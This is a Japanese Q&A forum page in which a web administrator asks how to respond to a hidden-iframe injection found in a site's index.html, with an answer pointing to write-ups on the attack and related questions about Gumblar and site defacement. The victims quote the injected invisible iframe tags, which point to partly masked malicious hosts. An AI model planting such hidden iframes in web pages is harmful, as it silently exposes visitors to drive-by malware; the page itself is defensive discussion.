<iframe>を使ったページ改ざんで被害を受けました。対策方法を教えてください。
- ウェブサイトの一部が<iframe>を使った改ざんを受けました。被害の内容や対策方法を教えてください。
- 改ざんされたファイルに<iframe src="?http://***.net/?click=D1A4LDM"? width=1 height=1 style="visibility:hidden;position:absolute"></iframe>というコードが追記されていました。
- 被害の原因や対策方法について、ウイルスの疑いやFTPログの調査結果なども含めて教えてください。
- ベストアンサー
<iframe>を使ったページ改ざんにあいました。対策をご教授お願いいたします。
初めて、質問をさせていただきます。 WEB関係の仕事をしていながら大変お恥ずかしいのですが、 アタックにより、管理しているウェブサイトの一部が改ざんされました。 (現象) 具体的には、「index.html」と名づけされたファイルの ソース最終部分に、以下のコードが追記されていました。 【URLは念のため、書き換えています】 <iframe src="?http://***.net/?click=D1A4LDM"? width=1 height=1 style="visibility:hidden;position:absolute"></iframe> ※他ファイル名は、拡張子が「html」であっても一切被害なし ※私は直接アクセスしていませんが、他担当によると、 本ドメインに接続すると、ブラウザクラッシュしたとの報告がありました。 ※click=以降の英数7文字は、乱数により各ページに異なった文字が記載 また、書き換えられたファイルのタイムスタンプを確認し、 該当時間のftpサーバログを調べると、社内IPからの接続形跡があり、 今回、改ざんされていた該当ファイルの書き換え履歴がありました。 現在、全ファイルの該当箇所を削除し、再アップロード。 また、利用していたFTPアカウントを廃止し、新規FTPアカウントを発行しました。 IDCには、サーバがクラックされた可能性がないが調査依頼し、 現在のところ、調査中です。 (ウイルスの疑いと、発見・駆除) ただ、その時間帯に誰もFTPを行っていなかったため、 ウイルスの可能性が考えられ、対策ソフトでスキャンしたところ、 1台より、W32.Sality.AM というウイルスが検出され、駆除しました。 ?http://www.threatexpert.com/report.aspx?md5=25583fd04e8f408a56f30ba...? しかし、ウイルスの性質を見ても、ftpアカウントを盗聴し、 特定サイトに接続し、index.htmlファイルをダウンロード、改ざん、アップロードする・・といった行為を 働くようなことは記載されていませんでした。 (皆様へご相談) FTPログに社内IPからのFTP接続履歴があったため、我々のセキュリティに問題があったことを 推測しているのですが、ウイルスレポートからも、発見されたウイルスが、現象を引き起こしたとは 特定しにくいと感じております。 そのため、ウイルス対策ソフトでは特定できない別のウイルスに感染している可能性を考えております。 国内のQ&Aサイトでは、同様の現象を発見できなかったため、 海外の掲示板を見たところ、同様の現象を発見したのですが、 原因までは特定されていませんでした。 そこで、ご存知の方がいらっしゃいましたらお知恵を拝借させていただきたいのですが、 本件の原因は何によるものでしょうか? また、書き換えられた箇所削除・FTPアカウント変更の他にすべき対策や、 今後のための予防措置などあれば、アドバイスいただけますと有難く存じます。 何卒、宜しくお願いいたします。
- papanno
- お礼率100% (1/1)
- ウィルス・マルウェア
- 回答数1
- ありがとう数1
- みんなの回答 (1)
- 専門家の回答
質問者が選んだベストアンサー
- ベストアンサー
「index.html visibility hidden position absolute iframe」のキーワードでぐぐってみました。以下のURL(英語)に答えがあるように思えますが、いかがでしょうか。 一番詳しいのはここ↓ http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/ この中で「AVG sees it as “Trojan Horse Downloader” and NOD32 sees it as “JS/Kryptik.B trojan”.」と述べていることに注目。 ここ↓でも同様の書き込みが見つかる。 http://forums.digitalpoint.com/showthread.php?t=1081659 ここ↓では、攻撃者にページがハックされてコードが埋め込まれたのではないかと述べられ、ESETがJS/Kryptik.B trojanを削除したと書いてある。(同様の書き込みが複数見つかる。) http://answers.yahoo.com/question/index?qid=20081221182928AAXXQcI
関連するQ&A
- 不正アクセスの改ざんとは?
この頃、FC2のファイルマネージャーに「最近ホームページにてiframeタグによる改ざんによりウィルスが埋め込まれてしまうサイトが増えております。」というお知らせが出ているのですが、この場合のiframeタグ(ログ?)の改ざん/書き換えというのは具体的にどのようなことなのでしょうか。 ・自分が掲載しているサイト内の写真や文章が書き換えられるという意味ではないですか? ・例えばTOPページで改ざんをされても、新たにTOPページをアップロードすれば、それは消え(上書きされ)ますか? ・そもそも改ざんは初心者が目で見てわかる場所(ソースなど)ではないのでしょうか? ・また現在、運営していなくても、ネット上にHPがあれば脅威に晒されますか? 以前にこの件を検索したとき、主な対処はプロバイダがするので個人では気にしても仕方がない、というような記事を見かけました。 ウィルスチェックをこまめにしておけばいいのかぐらいに思っていたのですが、先日、とある個人HPの方が「不正アクセスでログの改ざんが見つかったので閉鎖します」と告知を出していたので、他人事ではないのかもと不安になりました。 閉鎖をした管理人さんは、どのように改ざんを見つけたのか気になっていますが、もうコンタクトも取れないので確かめようもないです。 自分なりに改めて検索したのですが、警告や結果のニュースばかりで知りたい基本的なところがわかりませんでした。 恐縮ですが「不正アクセスの改ざん/書き換え」について、わかりやすく教えていただけたらと思います。
- ベストアンサー
- ウィルス・マルウェア
- ウェブページ改竄
FreeBSD5.3でApache2.2,最新のOpensslで管理しているウェブサーバがあり,そのサーバ上でウェブサーバを構築していたのですが,この度,ウェブページの改竄の被害に合いました. どういった経路で改竄されたかを調べるために/var/log/ にあるログを見たのですが,思い当たるようなログが残っていませんでした. 考えられる方法としては, 1.ウェブ編集の初心者向けにftpのポートを空けていたので,そちらのパスワードをクラックされた(→ftpdに関するログ) 2.sshが破られてrootのパスワードが盗まれた 等があると思いますが,ftpdのログや,lastlogin,およびhistoryの情報,/var/log/messages の情報等にそれらに該当するようなアクセス等は残っていませんでした. クラック用のツールとして rootkit 等があるようですが,それらで関連するログも全て削除されているのか,どういった経路で改竄が行われたかを調べるための方法が分かりません. サーバ上にはXoopsのページがあり,そちらからのアクセスも怪しいかなとは思ったのですが,Apacheに関するアクセスログやエラーログからもこれといった情報は得られませんでした. 対策としては,パケットフィルタリングを行いアクセスを制限することにし,ssh以外のアクセスを排除することにしたので,大体の不正アクセスは防げると思いますが,今後こういった現象を防ぐための勉強として,改竄の手口,およびこういった場合の進入手口に心当たりがあれば,ご教授よろしくお願いします.
- ベストアンサー
- その他(ITシステム運用・管理)
- ホームページの改ざん??
自分でホームページを持っております。 ヤフーのジオシティにおいてあるホームページ開いたところ、訳のわからない英語のページに転送されました。 FTPで接続してみたところ、全てのhtmlファイルの日付が更新されているようでした。 何か改ざんでもされたかと思い、パソコンにあるファイルで、再度、上書きしたところ直りました。 パスワードを変更してみましたが、その後、他のURLのホームページも調べたところ、htmlファイルの更新日付が同様に変わっておりました。(こちらの方は、他のページに転送はされませんでした。) 何かスパイウェアとかウィルスとか遠隔操作とかされているのでしょうか? 因みに、ウィルスバスターのオンラインスキャンでチェックしましたが、ウィルスに感染はされてないようです。
- 締切済み
- ウィルス・マルウェア
- サイト改ざん?
WPで作成したサイトを管理しています。 本日、ある箇所の内部リンク(不特定)をクリックすると、リンク先への遷移と同時に別ウィンドウが立ち上がり、海外のアダルトチャットのサイトへつながりました。 いつからこの現象が起こっていたかわかりませんが、本日発見しました。 ソースを確認してみましたが、今のところリンク周辺に怪しい記述は見当たりません。 また、上記減少はChromeとIEでは起こりましたが、FFでは起こりませんでした。 FTP情報を把握しているのは、私と社内でもう一人、業者が3社ほどあります。 サーバはさくらのビジネスプロです。 社内PCはセキュリティソフトにウィルスバスターを使用しており、そちらでの異常検知はありません。 業者はわかりませんが、社内の人間は、外部のPCからFTPにアクセスすることはありませんが、WPの管理画面にはアクセスすることがあります。(いずれもセキュリティソフト導入) 原因と対策等、ご教授頂けますでしょうか。 何卒よろしくお願い致します。 原因、対策など思い当たる
- ベストアンサー
- ネットワーク
- Perlで、アップロードしたファイルの改ざんを発見する
こんばんは、初心者なので困っています。 Perlで以下のような物を作成しろと言われました。 「サーバにアップロードされたバイナリファイルを、アップ後に、改ざんされたかどうか判るように、そのファイルについてのデータベースを作りなさい。 そのデータというのは、ファイルを数分割して、それぞれの頭の数字の合計の事で、それを保管しておけば改ざんされた時にはその数字が変わっているので発見できる」 という事でした。 この様な事は可能なのでしょうか? 可能でしたら、見当が付かないので参考になるHPなどはありませんでしょうか? よろしくお願いします。
- 締切済み
- Perl
- マルウェア対策についての素朴な疑問
こん○○は。 ウイルス・マルウェア対策をしていて、疑問に思った事がいくつかあります。 1.hostsファイルを読み込み専用にすればIPポイゾニング対策にならないか? 良くhostsファイルを書き換えるスパイウェアが存在しますが、 このファイルを読み込み専用にしていても書き換えはされてしまうのでしょうか? そうでないとすれば読み込み専用にすれば対策になると思うのです。 2.何故、ウイルス対策ソフトは削除するだけでいい 単独ファイルのウイルスに「駆除できませんでした」と 余計な事を言うのでしょうか? よく困惑する初心者がいるのですが。 「発見しました 削除しますか?隔離しますか?」だけで 十分だと思うのですが。 3.ブラウザキャッシュファイルのウイルス対策を考えると、 ウイルスチェック開始時にキャッシュを全て消せる機能が対策ソフトに あってもいいと思うのですが、何故無いのでしょうか?
- ベストアンサー
- ウィルス・マルウェア
- ウイルスの検知はないのに、ウェブサイトのソースにプログラムが勝手に挿入され修正ができない
ウェブサイトに <iframe src="http://xc8.**:8080/index.php" width=183 height=175 style="visibility: hidden"></iframe> というプログラムが勝手に挿入されて困っています。 ウイルスソフトがフリーのものだったので、カスペルスキー(internet security2009)を購入してスキャンしました。 以前は検知されていなかったTrojanなどいくつかのウイルスが検知されました。 勝手に挿入されるプログラムは、FTPサーバーにアップロードしたファイルを見ても入っていないのですが、ブラウザで確認すると入っています。削除とアップロードをしなおしてもまた入っていて、ウェブサイトは正常に表示できません。 レンタルサーバー側へもアカウントの変更をお願いし、一旦はなくなったのですが、また入ってしまったのか、再度アカウント変更をしても消すことができません。 カスペルスキーはフルスキャンしても「コンピューターは安全」と表示されるのですが、どうしたらよいかわからず困っています。よろしくお願いします。
- ベストアンサー
- ウィルス・マルウェア
- ウィルス対策の運営方法
こんにちは ウィルス対策ソフトを入れている windowsのファイルサーバーを使って社内でファイルを 共有しているのですが、 昨日、原田ウィルスと思われるウィルスにより 一部のフォルダ内のファイルが書き換えられてしまいました。 バックアップがあったので大事には至らなかったのですが 広告関係の仕事なので、客先から持ち帰ったデータなのか 何か別に持ち込んだものなのか特定できずにいます。 とにかく、FTPにてファイルのアップダウンを行い 実行はローカルマシン上で行うように運営しようか、 LINUXにて呼び込みと書き込みのみ権限を与えようかと 話し合っているのですが、 何かよい対策などありますでしょうか?
- ベストアンサー
- ウィルス・マルウェア
- 改ざん 至急お願いします><
改ざんされているサイトを閲覧してしまったかもしれません>< 改ざんされていた期間が1月4日から1月5日らしいのですが、そのサイトが改ざんされていたことを今知りました>< Gumblarという亜種らしいです。。。。。 今日まで普通にネットでクレジットカードで買い物をしていました(泣) PCはvistaで、ウイルス対策ソフトはWebroot spy sweeper with antivirusでファイアウォールはwindows ファイアウォール(vista)です。 これまでおかしいと思ったことは (1)この前、IEを起動したときにウインドウの縦の長さが少し短くなっていてたこと。(しかし次の日直っていた) ぐらいです。 (2)今なのですが、gooメールを見た後にgooのtopのボタンを押したら、小さい窓で「http://goo.ne.jp」は開けません的なことが表示され、OKを押したら、IEではこのページは表示されませんと表示されました。 adobe reader は最新なのですが、フラッシュ player?は最新かどうかまだ確認できてません。 windowsアップデートは最新の状態にしているのですが、phish wall は最新の状態ではありません>< やはりウイルス感染しているのでしょうか? オンラインスキャンで調べたいのですが、どこがいいでしょうか? 今までOCNのオンラインスキャンとf-secureのオンラインスキャンしか使ったことがないのですが、この二つのオンラインスキャンだけでウイルス(Gumblar)は発見できますか? また、そのサイトをIEのお気に入りに入れているのですが、消したほうがいいですか?
- ベストアンサー
- ウィルス・マルウェア
- Gumblarはどこに感染していたのでしょうか。
Gumblarはどこに感染していたのでしょうか。 OSはWinXP、ウイルスバスター2009を利用しています。普段使用しているブラウザはOperaです。 先日4月1日、ウイルスバスター2009のセキュリティダッシュボードを見たところ、 3月30日に「POSSIBLE_GUMB-3」(Gumblar)と「JS_ONLOAD.SMC」が発見されていたとありました。 2つは同時にリアルタイム検索で発見されていたらしく、自動的に前者はロック(その後隔離されていたファイルを自分で削除しました)、後者は削除されています。 その後のバスター最新定義ファイルでのウイルス検索、また他社のオンラインスキャンでの検索両方でウイルス等は発見されませんでした。 PCにも特に異常はありません。 ローカルのHTMLファイルのソースもすべて確認しましたが改ざんの形跡はありませんでした。 その1日前にWebサイトをFTPツール(HPビルダー付属の物)で更新しましたが、更新先のページにも改ざん形跡はありません。 ここからが疑問点です。 ウイルスの発見場所はOperaのキャッシュフォルダ内・ウェブサイトのキャッシュでしたので、Web経由で入った物がブロックされたのだろうと思っていましたが、セキュリティダッシュボードのログには「感染元:ファイル転送」とあります。 そのような時間にFTPツールを使った覚えはありません。 また、仮に自分から送信したファイルが感染していたなら、自分のローカルに保存されていたHTMLファイルなりがウイルス検索に引っかかっているはずだと思うのですが、何故か引っかかったファイルはOperaのキャッシュファイルです。 一つ思い当たる点を上げるとすれば、FC2のファイルアップロード機能でウェブサイトを更新しようとした点ですが、それも時間が合いません。(そもそもファイルアップロード機能はFTPではないような気もします) 一体どういうことなのでしょうか。 まだ私のPC内にはウイルスが存在しているのでしょうか。 気味が悪いのでパソコンをクリーンインストールしようと考えているところですが、どうも釈然としません。
- ベストアンサー
- ウィルス・マルウェア
お礼
アドバイスを頂き、ありがとうございます。 ご紹介いただいたサイトは、まさに探していた情報が記載されていました。 これまでに確認できた事実が、上記ウイルスのみであったことと、 他の情報サイトを確認しても侵入経路が不明というケースが多かったため、 大変参考になりました。 有難うございました!